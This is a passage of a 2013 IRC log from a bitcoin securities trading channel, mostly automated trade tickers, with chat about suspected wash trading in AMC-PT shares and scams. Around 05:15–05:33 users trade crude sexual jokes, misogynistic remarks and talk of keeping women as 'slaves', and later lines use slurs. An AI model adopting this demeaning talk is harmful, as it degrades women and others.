= 0.2298 BTC [+] Jul 20 21:13:02 [HAVELOCK] [AM100] 1 @ 0.043989 BTC [+] Jul 20 21:13:41 what is up with hashrack seems too good of a deal Jul 20 21:13:59 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [-] Jul 20 21:16:40 [HAVELOCK] [AM100] 1 @ 0.043989 BTC [+] Jul 20 21:17:34 [BTCTC] [COGNITIVE] 1 @ 0.800001 BTC [-] Jul 20 21:17:36 [BTCTC] [COGNITIVE] 1 @ 0.8 BTC [-] Jul 20 21:17:37 [BTCTC] [COGNITIVE] 1 @ 0.79 BTC [-] Jul 20 21:17:39 [BTCTC] [COGNITIVE] 5 @ 0.778505 = 3.8925 BTC [-] Jul 20 21:17:40 [BTCTC] [COGNITIVE] 5 @ 0.778505 = 3.8925 BTC [-] Jul 20 21:17:41 [BTCTC] [COGNITIVE] 8 @ 0.778504 = 6.228 BTC [-] Jul 20 21:17:43 [BTCTC] [COGNITIVE] 1 @ 0.7785 BTC [-] Jul 20 21:17:43 [BTCTC] [COGNITIVE] 1 @ 0.778 BTC [-] Jul 20 21:17:44 [BTCTC] [COGNITIVE] 10 @ 0.776006 = 7.7601 BTC [-] Jul 20 21:17:46 [BTCTC] [COGNITIVE] 17 @ 0.776005 = 13.1921 BTC [-] Jul 20 21:19:47 [BTCTC] [AMC-PT] 12000 @ 0.0025 = 30 BTC [-] Jul 20 21:20:49 [HAVELOCK] [HIM] 3 @ 0.252 = 0.756 BTC [-] Jul 20 21:25:13 [BTCTC] [TAT.ASICMINER] 7 @ 0.045093 = 0.3157 BTC [-] Jul 20 21:25:15 [BTCTC] [TAT.ASICMINER] 138 @ 0.044315 = 6.1155 BTC [-] Jul 20 21:25:17 [BTCTC] [TAT.ASICMINER] 19 @ 0.044314 = 0.842 BTC [-] Jul 20 21:26:36 [HAVELOCK] [HIM] 4 @ 0.251 = 1.004 BTC [-] Jul 20 21:26:44 [HAVELOCK] [HIM] 1 @ 0.241 BTC [-] Jul 20 21:26:54 [HAVELOCK] [HIM] 15 @ 0.240404 = 3.6061 BTC [-] Jul 20 21:27:08 [BTCTC] [AMC-PT] 2898 @ 0.0025 = 7.245 BTC [-] Jul 20 21:27:58 [BTCTC] [DMS.MINING] 5 @ 0.016 = 0.08 BTC [-] Jul 20 21:33:33 [BTCTC] [AMC-PT] 348 @ 0.0025 = 0.87 BTC [-] Jul 20 21:48:51 [HAVELOCK] [AM100] 1 @ 0.043989 BTC [+] Jul 20 21:49:39 [HAVELOCK] [AM100] 1 @ 0.043989 BTC [+] Jul 20 21:59:13 [HAVELOCK] [AM100] 3 @ 0.04312 = 0.1294 BTC [-] Jul 20 21:59:18 [HAVELOCK] [AM100] 1 @ 0.04288889 BTC [-] Jul 20 21:59:25 [HAVELOCK] [AM100] 4 @ 0.04250425 = 0.17 BTC [-] Jul 20 21:59:31 [BTCTC] [COGNITIVE] 1 @ 0.847884 BTC [+] Jul 20 22:00:27 [BTCTC] [S.MPOE-PT] 6 @ 0.0009 = 0.0054 BTC [-] Jul 20 22:03:34 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jul 20 22:03:58 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jul 20 22:07:27 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jul 20 22:09:04 [BTCTC] [AMC-PT] 790 @ 0.0025 = 1.975 BTC [-] Jul 20 22:09:32 [BTCTC] [AMC-PT] 7 @ 0.0025 = 0.0175 BTC [-] Jul 20 22:10:25 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [-] Jul 20 22:12:17 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [-] Jul 20 22:19:59 [BTCTC] [AMC-PT] 4000 @ 0.0025 = 10 BTC [-] Jul 20 22:21:48 [HAVELOCK] [SMG] 900 @ 0.0002602 = 0.2342 BTC [-] Jul 20 22:22:59 [BTCTC] [AMC-PT] 20000 @ 0.0025 = 50 BTC [-] Jul 20 22:23:02 [BTCTC] [AMC-PT] 140 @ 0.0025 = 0.35 BTC [-] Jul 20 22:25:39 [BTCTC] [TAT.ASICMINER] 7 @ 0.04599 = 0.3219 BTC [+] Jul 20 22:25:49 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [-] Jul 20 22:26:31 [BTCTC] [COGNITIVE] 1 @ 0.847883 BTC [-] Jul 20 22:26:32 [BTCTC] [AMC-PT] 8 @ 0.0025 = 0.02 BTC [-] Jul 20 22:29:03 [BTCTC] [ASICMINER-PT] 1 @ 4.689 BTC [+] Jul 20 22:29:53 [BTCTC] [CRYPTO-TRADE] 5 @ 0.199998 = 1 BTC [+] Jul 20 22:30:17 [BTCTC] [AMC-PT] 1865 @ 0.0025 = 4.6625 BTC [-] Jul 20 22:30:21 [BTCTC] [AMC-PT] 145 @ 0.0025 = 0.3625 BTC [-] Jul 20 22:30:33 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jul 20 22:30:49 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [-] Jul 20 22:34:21 [BTCTC] [AMC-PT] 1250 @ 0.0025 = 3.125 BTC [-] Jul 20 22:34:24 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jul 20 22:35:26 [BTCTC] [AMC-PT] 7 @ 0.0025 = 0.0175 BTC [-] Jul 20 22:37:20 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [-] Jul 20 22:38:55 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [-] Jul 20 22:39:37 [HAVELOCK] [HIM] 4 @ 0.26 = 1.04 BTC [+] Jul 20 22:45:42 [BTCTC] [AMC-PT] 61 @ 0.0025 = 0.1525 BTC [-] Jul 20 22:49:31 [BTCTC] [DMS.MINING] 10 @ 0.016 = 0.16 BTC [-] Jul 20 22:51:29 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [-] Jul 20 22:57:28 [BTCTC] [DMS.PURCHASE] 1 @ 0.039514 BTC [+] Jul 20 22:58:05 [HAVELOCK] [SDSTM] 1 @ 0.01082 BTC [-] Jul 20 22:58:07 [HAVELOCK] [SDSTM] 49 @ 0.010811 = 0.5297 BTC [-] Jul 20 22:58:17 [BTCTC] [AMC-PT] 730 @ 0.0025 = 1.825 BTC [-] Jul 20 22:59:29 [BTCTC] [TAT.ASICMINER] 20 @ 0.044605 = 0.8921 BTC [-] Jul 20 23:01:48 [HAVELOCK] [AM100] 27 @ 0.04353699 = 1.1755 BTC [+] Jul 20 23:01:55 [HAVELOCK] [AM100] 18 @ 0.04329999 = 0.7794 BTC [-] Jul 20 23:02:04 [HAVELOCK] [AM100] 30 @ 0.04309296 = 1.2928 BTC [-] Jul 20 23:02:11 [HAVELOCK] [AM100] 15 @ 0.04300029 = 0.645 BTC [-] Jul 20 23:04:18 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [-] Jul 20 23:05:27 [BTCTC] [ASICMINER-PT] 1 @ 4.625 BTC [-] Jul 20 23:05:30 [BTCTC] [ASICMINER-PT] 1 @ 4.623001 BTC [-] Jul 20 23:05:47 [BTCTC] [ASICMINER-PT] 2 @ 4.620001 = 9.24 BTC [-] Jul 20 23:05:48 [BTCTC] [ASICMINER-PT] 1 @ 4.603001 BTC [-] Jul 20 23:05:50 [BTCTC] [ASICMINER-PT] 1 @ 4.603 BTC [-] Jul 20 23:08:03 [BTCTC] [AMC-PT] 12000 @ 0.0025 = 30 BTC [-] Jul 20 23:08:44 so basically they AMC guy is pretty smart Jul 20 23:08:56 he's just buying his own shares over and over Jul 20 23:09:06 the cost being the exchange's trade fees Jul 20 23:09:12 but generating hype Jul 20 23:09:27 and sweeping up other buyers in it Jul 20 23:10:11 exactly goat's moves with the pirate bonds back in the day Jul 20 23:10:42 [HAVELOCK] [AM100] 36 @ 0.043988 = 1.5836 BTC [+] Jul 20 23:13:01 [BTCTC] [AMC-PT] 21 @ 0.0025 = 0.0525 BTC [-] Jul 20 23:13:21 [BTCTC] [ASICMINER-PT] 1 @ 4.603002 BTC [+] Jul 20 23:13:23 [BTCTC] [ASICMINER-PT] 2 @ 4.603001 = 9.206 BTC [-] Jul 20 23:13:25 [BTCTC] [ASICMINER-PT] 1 @ 4.603 BTC [-] Jul 20 23:13:27 [BTCTC] [ASICMINER-PT] 1 @ 4.602 BTC [-] Jul 20 23:13:29 [BTCTC] [BTC-TRADING-PT] 1 @ 0.87501 BTC [-] Jul 20 23:14:32 [BTCTC] [AMC-PT] 130 @ 0.0025 = 0.325 BTC [-] Jul 20 23:15:04 [BTCTC] [AMC-PT] 1500 @ 0.0025 = 3.75 BTC [-] Jul 20 23:15:33 he's doing it still Jul 20 23:15:35 with COG Jul 20 23:16:50 [HAVELOCK] [SMG] 350 @ 0.00028 = 0.098 BTC [+] Jul 20 23:17:07 [BTCTC] [AMC-PT] 9167 @ 0.0025 = 22.9175 BTC [-] Jul 20 23:17:20 Bah Jul 20 23:17:21 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [-] Jul 20 23:17:51 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [-] Jul 20 23:19:21 [HAVELOCK] [SMG] 538 @ 0.00028 = 0.1506 BTC [+] Jul 20 23:19:23 [HAVELOCK] [SMG] 25 @ 0.00028 = 0.007 BTC [+] Jul 20 23:19:26 [HAVELOCK] [SMG] 1437 @ 0.000288 = 0.4139 BTC [+] Jul 20 23:20:33 [BTCTC] [BASIC-MINING] 3 @ 0.7185 = 2.1555 BTC [-] Jul 20 23:20:47 [HAVELOCK] [AM100] 1 @ 0.0425 BTC [-] Jul 20 23:21:05 [BTCTC] [BASIC-MINING] 3 @ 0.7185 = 2.1555 BTC [-] Jul 20 23:21:30 [BTCTC] [BASIC-MINING] 3 @ 0.7185 = 2.1555 BTC [-] Jul 20 23:21:45 [HAVELOCK] [SMG] 750 @ 0.000285 = 0.2138 BTC [-] Jul 20 23:21:47 [HAVELOCK] [SMG] 628 @ 0.000288 = 0.1809 BTC [+] Jul 20 23:21:50 [HAVELOCK] [SMG] 122 @ 0.00028888 = 0.0352 BTC [+] Jul 20 23:23:55 [BTCTC] [AMC-PT] 250 @ 0.0025 = 0.625 BTC [-] Jul 20 23:23:58 [HAVELOCK] [SMG] 10 @ 0.00028888 = 0.0029 BTC [+] Jul 20 23:24:17 So you seem pretty convinced that am is a scam Jul 20 23:24:43 <@assbot> [BTCTC] [AMC-PT] 250 @ 0.0025 = 0.625 BTC [-] << shouldn't it show a [+] as they were bought and not sold? Jul 20 23:27:41 [HAVELOCK] [AM100] 50 @ 0.0425 = 2.125 BTC [-] Jul 20 23:29:37 [BTCTC] [AMC-PT] 284 @ 0.0025 = 0.71 BTC [-] Jul 20 23:29:37 rulother-gs: depends on which am you mean Jul 20 23:30:06 Errr AMC sorry Jul 20 23:30:13 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jul 20 23:30:17 [BTCTC] [AMC-PT] 30000 @ 0.0025 = 75 BTC [-] Jul 20 23:30:21 dexX7: it doesn't indicate sales or buys, it's relative to the previous trade Jul 20 23:31:26 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [-] Jul 20 23:31:34 i see, thanks for clearing this missunderstanding.. :) Jul 20 23:32:25 [BTCTC] [AMC-PT] 1600 @ 0.0025 = 4 BTC [-] Jul 20 23:32:43 [BTCTC] [BASIC-MINING] 3 @ 0.7199 = 2.1597 BTC [+] Jul 20 23:32:55 [BTCTC] [DMS.MINING] 40 @ 0.015651 = 0.626 BTC [-] Jul 20 23:32:56 [BTCTC] [DMS.MINING] 25 @ 0.01565 = 0.3913 BTC [-] Jul 20 23:32:58 [BTCTC] [DMS.MINING] 46 @ 0.0156 = 0.7176 BTC [-] Jul 20 23:32:59 [BTCTC] [DMS.MINING] 192 @ 0.0156 = 2.9952 BTC [-] Jul 20 23:33:01 [BTCTC] [BASIC-MINING] 2 @ 0.7199 = 1.4398 BTC [+] Jul 20 23:33:13 [BTCTC] [AMC-PT] 75 @ 0.0025 = 0.1875 BTC [-] Jul 20 23:33:49 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [-] Jul 20 23:34:14 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [-] Jul 20 23:36:51 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jul 20 23:37:51 [BTCTC] [B.YABMC] 1 @ 0.003172 BTC [+] Jul 20 23:38:20 [BTCTC] [ASICMINER-PT] 1 @ 4.649999 BTC [+] Jul 20 23:43:04 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jul 20 23:44:18 [BTCTC] [AMC-PT] 486 @ 0.0025 = 1.215 BTC [-] Jul 20 23:45:11 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jul 20 23:45:16 [BTCTC] [AMC-PT] 650 @ 0.0025 = 1.625 BTC [-] Jul 20 23:45:56 [BTCTC] [AMC-PT] 1100 @ 0.0025 = 2.75 BTC [-] Jul 20 23:46:32 [BTCTC] [BASIC-MINING] 2 @ 0.72 = 1.44 BTC [+] Jul 20 23:46:33 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jul 20 23:46:49 [BTCTC] [AMC-PT] 994 @ 0.0025 = 2.485 BTC [-] Jul 20 23:49:43 [BTCTC] [AMC-PT] 250 @ 0.0025 = 0.625 BTC [-] Jul 20 23:49:49 [HAVELOCK] [AM100] 1 @ 0.04333333 BTC [+] Jul 20 23:50:54 [BTCTC] [AMC-PT] 23 @ 0.0025 = 0.0575 BTC [-] Jul 20 23:51:39 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [-] Jul 20 23:51:52 [BTCTC] [BASIC-MINING] 3 @ 0.696001 = 2.088 BTC [-] Jul 20 23:51:54 [BTCTC] [BASIC-MINING] 2 @ 0.696 = 1.392 BTC [-] Jul 20 23:51:54 [BTCTC] [BASIC-MINING] 11 @ 0.69525 = 7.6478 BTC [-] Jul 20 23:51:56 [BTCTC] [BASIC-MINING] 105 @ 0.69515 = 72.9908 BTC [-] Jul 20 23:51:57 [BTCTC] [BASIC-MINING] 9 @ 0.695005 = 6.255 BTC [-] Jul 20 23:51:59 [BTCTC] [BASIC-MINING] 1 @ 0.695 BTC [-] Jul 20 23:52:53 [BTCTC] [ASICMINER-PT] 3 @ 4.65 = 13.95 BTC [+] Jul 20 23:56:48 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [-] Jul 20 23:57:41 [BTCTC] [AMC-PT] 170 @ 0.0025 = 0.425 BTC [-] Jul 20 23:58:15 [BTCTC] [ASICMINER-PT] 3 @ 4.7 = 14.1 BTC [+] Jul 20 23:58:31 [BTCTC] [AMC-PT] 11000 @ 0.0025 = 27.5 BTC [-] Jul 20 23:58:55 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [-] Jul 20 23:59:27 [BTCTC] [AMC-PT] 1080 @ 0.0025 = 2.7 BTC [-] Jul 20 23:59:45 [BTCTC] [ASICMINER-PT] 1 @ 4.709993 BTC [+] Jul 20 23:59:46 [BTCTC] [ASICMINER-PT] 2 @ 4.717 = 9.434 BTC [+] Jul 20 23:59:49 [BTCTC] [ASICMINER-PT] 4 @ 4.728 = 18.912 BTC [+] Jul 20 23:59:51 [BTCTC] [ASICMINER-PT] 1 @ 4.729 BTC [+] Jul 20 23:59:52 [BTCTC] [ASICMINER-PT] 1 @ 4.7294 BTC [+] Jul 20 23:59:53 [BTCTC] [ASICMINER-PT] 1 @ 4.72941 BTC [+] Jul 21 00:03:37 [BTCTC] [AMC-PT] 1995 @ 0.0025 = 4.9875 BTC [-] Jul 21 00:06:02 [HAVELOCK] [SMG] 56 @ 0.00028888 = 0.0162 BTC [+] Jul 21 00:07:09 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [-] Jul 21 00:08:26 [BTCTC] [AMC-PT] 1155 @ 0.0025 = 2.8875 BTC [-] Jul 21 00:09:44 [BTCTC] [AMC-PT] 5555 @ 0.0025 = 13.8875 BTC [-] Jul 21 00:10:20 [BTCTC] [COGNITIVE] 1 @ 0.810001 BTC [-] Jul 21 00:11:29 [BTCTC] [TAT.ASICMINER] 11 @ 0.045691 = 0.5026 BTC [+] Jul 21 00:12:02 [BTCTC] [TAT.ASICMINER] 8 @ 0.045691 = 0.3655 BTC [+] Jul 21 00:12:12 [BTCTC] [TAT.ASICMINER] 75 @ 0.0457 = 3.4275 BTC [+] Jul 21 00:12:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.045743 BTC [+] Jul 21 00:13:58 [BTCTC] [AMC-PT] 600 @ 0.0025 = 1.5 BTC [-] Jul 21 00:15:09 [BTCTC] [B.YABMC] 101 @ 0.002456 = 0.2481 BTC [-] Jul 21 00:15:14 [BTCTC] [B.YABMC] 1 @ 0.002455 BTC [-] Jul 21 00:15:15 [BTCTC] [B.YABMC] 179 @ 0.002415 = 0.4323 BTC [-] Jul 21 00:16:13 [BTCTC] [AMC-PT] 13 @ 0.0025 = 0.0325 BTC [-] Jul 21 00:16:26 [BTCTC] [DMS.SELLING] 42 @ 0.0244 = 1.0248 BTC [+] Jul 21 00:17:37 rulother-gs im not convinced, it's just the standard presumption. Jul 21 00:17:37 [BTCTC] [AMC-PT] 600 @ 0.0025 = 1.5 BTC [-] Jul 21 00:17:44 literally no reason to even consider it anything else. Jul 21 00:20:19 [BTCTC] [TAT.ASICMINER] 31 @ 0.044752 = 1.3873 BTC [-] Jul 21 00:21:31 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003918 = 0.0392 BTC [+] Jul 21 00:21:39 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jul 21 00:22:12 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003918 = 0.0392 BTC [+] Jul 21 00:23:58 [BTCTC] [BASIC-MINING] 1 @ 0.670001 BTC [-] Jul 21 00:24:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.045691 = 0.2285 BTC [+] Jul 21 00:24:59 [BTCTC] [AMC-PT] 1250 @ 0.0025 = 3.125 BTC [-] Jul 21 00:25:13 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003916 = 0.0392 BTC [-] Jul 21 00:25:15 [BTCTC] [B.YABMC] 1 @ 0.002403 BTC [-] Jul 21 00:25:54 [BTCTC] [AMC-PT] 270 @ 0.0025 = 0.675 BTC [-] Jul 21 00:26:43 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003916 = 0.0392 BTC [-] Jul 21 00:26:45 [BTCTC] [TAT.VIRTUALMINE] 90 @ 0.003917 = 0.3525 BTC [+] Jul 21 00:27:23 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003916 = 0.0392 BTC [-] Jul 21 00:27:33 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [-] Jul 21 00:27:35 [HAVELOCK] [SMG] 175 @ 0.00028888 = 0.0506 BTC [+] Jul 21 00:28:48 [BTCTC] [AMC-PT] 44140 @ 0.0025 = 110.35 BTC [-] Jul 21 00:29:09 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003922 = 0.0392 BTC [+] Jul 21 00:29:25 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [-] Jul 21 00:30:00 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003922 = 0.0392 BTC [+] Jul 21 00:30:19 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jul 21 00:30:42 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003922 = 0.0392 BTC [+] Jul 21 00:30:47 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [-] Jul 21 00:31:27 [BTCTC] [TAT.ASICMINER] 50 @ 0.044802 = 2.2401 BTC [-] Jul 21 00:31:47 [BTCTC] [AMC-PT] 25000 @ 0.0025 = 62.5 BTC [-] **** BEGIN LOGGING AT Sun Jul 21 05:02:01 2013 Jul 21 05:02:06 [MPEX] [S.MPOE] 7600 @ 0.00088133 = 6.6981 BTC [-] Jul 21 05:02:13 [BTCTC] [AMC-PT] 10 @ 0.00267 = 0.0267 BTC [+] Jul 21 05:05:16 [BTCTC] [AMC-PT] 55 @ 0.00266 = 0.1463 BTC [-] Jul 21 05:06:17 [BTCTC] [TAT.ASICMINER] 15 @ 0.045691 = 0.6854 BTC [+] Jul 21 05:07:09 [HAVELOCK] [AM100] 18 @ 0.0433 = 0.7794 BTC [+] Jul 21 05:12:16 [MPEX] [S.MPOE] 7200 @ 0.00088097 = 6.343 BTC [-] Jul 21 05:13:01 [BTCTC] [DMS.PURCHASE] 100 @ 0.039514 = 3.9514 BTC [+] Jul 21 05:15:14 Kirk Douglas said he got throat cancer like that- from eating pussy. Jul 21 05:16:17 Sorry, I tend to come off a bit blunt for our panty-waist modern society. I think it all started because of women's lib. Jul 21 05:16:31 woman's lib never happened Jul 21 05:16:47 if it did, WOMEN WOULD QUIT TALKING ABOUT IT AND ENJOY THEIR EQUAL SALARIES AND EQUAL CHANCES AT JOBS Jul 21 05:17:29 whatever i'm missing out of this convo makes it a shitton better. Jul 21 05:19:19 mircea_popescu: dude, you have what 4 slaves now? Jul 21 05:19:28 thats the opposite of woman's lib Jul 21 05:19:32 it varies. Jul 21 05:19:41 how's it opposite of woman's lib ? Jul 21 05:19:59 because women's lib means they want to dominate men and keep them as pets Jul 21 05:20:29 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003749 BTC [+] Jul 21 05:20:38 well no. traditional fambly = woman property of her father, transferred to some guy she marries. Jul 21 05:20:40 women' Jul 21 05:20:45 s lib = woman property of herself. Jul 21 05:20:58 since they're not my daughters and i don't tend to marry, slavery requires women's lib. Jul 21 05:22:47 [HAVELOCK] [SMG] 12 @ 0.00028779 = 0.0035 BTC [-] Jul 21 05:24:28 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00375 BTC [+] Jul 21 05:33:17 4 slaves is a harem Jul 21 05:33:22 if they are womens Jul 21 05:33:31 [MPEX] [S.MPOE] 3231 @ 0.00088133 = 2.8476 BTC [+] Jul 21 05:33:33 [MPEX] [S.MPOE] 2900 @ 0.00088295 = 2.5606 BTC [+] Jul 21 05:36:00 [HAVELOCK] [SMG] 20 @ 0.00028779 = 0.0058 BTC [-] Jul 21 05:37:58 https://bitcointalk.org/index.php?topic=126588.0 Jul 21 05:38:05 ^true story Jul 21 05:38:06 Scammer Trade Fortress Jul 21 05:39:15 [HAVELOCK] [SMG] 1000 @ 0.00028779 = 0.2878 BTC [-] Jul 21 05:39:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003749 BTC [-] Jul 21 05:40:32 [HAVELOCK] [SDSTM] 25 @ 0.0119 = 0.2975 BTC [+] Jul 21 05:41:14 KRS1 soo ? Jul 21 05:50:17 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00374 BTC [-] Jul 21 05:50:19 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.00375 = 0.0225 BTC [+] Jul 21 05:51:00 ;;calc 13 28 Jul 21 05:51:00 Error: unexpected EOF while parsing (, line 1) Jul 21 05:51:06 ;;calc 13 * 28 Jul 21 05:51:06 364 Jul 21 05:51:16 ;;calc 380 / 28 Jul 21 05:51:16 13.5714285714 Jul 21 05:51:38 thestringpuller!*@* added to ignore list. Jul 21 05:52:53 [HAVELOCK] [HIM] 1 @ 0.258 BTC [+] Jul 21 05:53:15 [HAVELOCK] [AM100] 10 @ 0.0439 = 0.439 BTC [+] Jul 21 06:02:11 [BTCTC] [AMC-PT] 14 @ 0.00261 = 0.0365 BTC [-] Jul 21 06:02:21 [BTCTC] [AMC-PT] 986 @ 0.00261 = 2.5735 BTC [-] Jul 21 06:16:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.045667 = 0.1827 BTC [-] Jul 21 06:18:05 [BTCTC] [ASICMINER-PT] 5 @ 4.73 = 23.65 BTC [-] Jul 21 06:24:59 [BTCTC] [TAT.ASICMINER] 6 @ 0.045001 = 0.27 BTC [-] Jul 21 06:26:09 https://forums.eveonline.com/default.aspx?g=posts&m=2887392 Jul 21 06:26:14 [Proposal] Bitcoin as a payment option for either PLEX or Subscriptions - Assembly Hall - EVE Jul 21 06:26:15 [MPEX] [S.MPOE] 2300 @ 0.00088097 = 2.0262 BTC [-] Jul 21 06:26:17 [MPEX] [S.MPOE] 14550 @ 0.00087957 = 12.7977 BTC [-] Jul 21 06:26:25 nothing quite like bitcoin to expose how utterly retarded average schmoe is Jul 21 06:26:30 [MPEX] [S.MPOE] 8978 @ 0.00087916 = 7.8931 BTC [-] Jul 21 06:26:32 "I have been involved in network engineering since dial up and isdn lines were the only mass connection options available to non businesses. so yes, I am VERY aware what a DDoS is, http://techcrunch.com/2013/04/10/bitcoin-crash/ Jul 21 06:26:32 the primary market for bitcoin trades is online only, and does not have the infrastructure stability of the major trading markets. The currency is not backed by any financial or governmental entity, it is purely the bittorrrent of ponzi marketing, perhaps they should have called it Scamway." Jul 21 06:26:34 he knows shit. Jul 21 06:27:01 [BTCTC] [DMS.SELLING] 3 @ 0.0245 = 0.0735 BTC [-] Jul 21 06:27:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.045001 BTC [-] Jul 21 06:27:37 _lol_ Jul 21 06:27:45 its like random buzzwords put together Jul 21 06:28:33 right ? Jul 21 06:28:41 [BTCTC] [AMC-PT] 772 @ 0.00266 = 2.0535 BTC [+] Jul 21 06:28:51 basically by now half the internet is made up of these unemployable twats. Jul 21 06:29:03 nevertheless thye know shit. Jul 21 06:30:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.045001 BTC [-] Jul 21 06:30:21 [BTCTC] [AMC-PT] 118 @ 0.00267 = 0.3151 BTC [+] Jul 21 06:30:44 [HAVELOCK] [SMG] 3 @ 0.00028779 = 0.0009 BTC [-] Jul 21 06:31:52 [HAVELOCK] [SDSTM] 3 @ 0.0119 = 0.0357 BTC [+] Jul 21 06:32:22 [BTCTC] [ASICMINER-PT] 1 @ 4.73 BTC [-] Jul 21 06:32:39 [HAVELOCK] [KCIM] 1 @ 0.9 BTC [+] Jul 21 06:33:17 [MPEX] [S.MG] 16200 @ 0.0002 = 3.24 BTC [-] Jul 21 06:33:19 [MPEX] [S.MG] 18800 @ 0.000185 = 3.478 BTC [-] Jul 21 06:33:43 [HAVELOCK] [SDSTM] 13 @ 0.0119 = 0.1547 BTC [+] Jul 21 06:34:26 [BTCTC] [AMC-PT] 457 @ 0.00267 = 1.2202 BTC [+] Jul 21 06:35:18 [BTCTC] [DMS.MINING] 26 @ 0.015201 = 0.3952 BTC [-] Jul 21 06:35:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.045 BTC [-] Jul 21 06:36:21 " It was started in 1986 by surviving members of the now defunct Suicide Club of San Francisco." Jul 21 06:36:25 epic sentence is epic. Jul 21 06:36:57 [BTCTC] [DMS.SELLING] 1 @ 0.024 BTC [-] Jul 21 06:40:03 [BTCTC] [ASICMINER-PT] 1 @ 4.783999 BTC [+] Jul 21 06:41:20 [BTCTC] [AMC-PT] 3399 @ 0.002631 = 8.9428 BTC [-] Jul 21 06:41:48 [BTCTC] [AMC-PT] 6310 @ 0.00263 = 16.5953 BTC [-] Jul 21 06:42:02 !t btctc amc-pt Jul 21 06:42:04 [BTCT:AMC-PT] 1D: 0.00231 / 0.00252 / 0.002778 (602062 shares, 1517.5 BTC), 7D: 0.00231 / 0.00252 / 0.00345 (2745232 shares, 6927.6 BTC), 30D: 0.00099 / 0.00244 / 0.1 (4125960 shares, 10075.8 BTC) Jul 21 06:42:09 !t btctc ASICMINER-PT Jul 21 06:42:11 [BTCT:ASICMINER-PT] 1D: 4.581 / 4.69423 / 4.85 (261 shares, 1225.2 BTC), 7D: 4.160002 / 4.5591 / 4.9 (3504 shares, 15975.1 BTC), 30D: 2.8501 / 4.13851 / 5.17 (16574 shares, 68591.7 BTC) Jul 21 06:42:22 so today amc-pt has traded more than asicminer. Jul 21 06:42:29 so much for taking the volumes seriously. Jul 21 06:42:44 but amc is srs bsns Jul 21 06:43:09 surely. Jul 21 06:43:29 got pics and everything Jul 21 06:43:40 wasn't angryguy vmc ? Jul 21 06:43:45 hm Jul 21 06:43:50 ur rite. Jul 21 06:43:54 i dont have pic :( Jul 21 06:44:25 30D: 0.00099 / 0.00244 / 0.1 << that part is pretty lulzy Jul 21 06:48:23 [BTCTC] [TAT.ASICMINER] 50 @ 0.044999 = 2.25 BTC [-] Jul 21 06:48:36 [BTCTC] [BASIC-MINING] 3 @ 0.6899 = 2.0697 BTC [-] Jul 21 06:54:38 [BTCTC] [ASICMINER-PT] 2 @ 4.779987 = 9.56 BTC [-] Jul 21 06:56:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003654 BTC [-] Jul 21 06:59:25 [BTCTC] [AMC-PT] 600 @ 0.00267 = 1.602 BTC [+] Jul 21 07:00:59 [HAVELOCK] [SMG] 14 @ 0.00028688 = 0.004 BTC [-] Jul 21 07:01:33 [BTCTC] [COGNITIVE] 1 @ 0.777707 BTC [-] Jul 21 07:01:34 [BTCTC] [COGNITIVE] 1 @ 0.777706 BTC [-] Jul 21 07:01:36 [BTCTC] [COGNITIVE] 2 @ 0.777704 = 1.5554 BTC [-] Jul 21 07:01:37 [BTCTC] [COGNITIVE] 2 @ 0.777702 = 1.5554 BTC [-] Jul 21 07:01:39 [BTCTC] [COGNITIVE] 2 @ 0.7777 = 1.5554 BTC [-] Jul 21 07:01:40 [BTCTC] 